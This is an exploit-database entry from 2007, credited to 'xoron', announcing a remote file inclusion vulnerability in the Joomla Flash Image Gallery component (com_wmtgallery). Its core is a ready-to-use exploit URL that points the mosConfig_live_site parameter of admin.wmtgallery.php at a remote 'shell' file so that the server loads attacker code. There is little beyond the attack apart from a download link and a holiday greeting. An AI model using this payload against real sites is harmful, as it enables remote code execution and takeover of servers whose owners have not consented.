id: 2201
date: 10/06/2007
title: Joomla Flash Image Gallery Component RFI Vulnerability
author: xoron
cves: 

======================================================
Joomla Flash Image Gallery Component RFI Vulnerability
======================================================



============================================
=                                          =
=             XORON  (c) 2007              =
=                                          =
============================================
=                                          =
=Joomla com_wmtgallery Remote File Include  
=                                          =
============================================
=
= Download:
=
= http://www.webmaster-tips.net
=
============================================
=
= Exploit:
= /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=shell?
=
============================================
=                                          =
=Tum islam aleminin ramazan bayrami mubarek olsn =
=                                          =
============================================ 




#  0day.today [2023-03-26]  #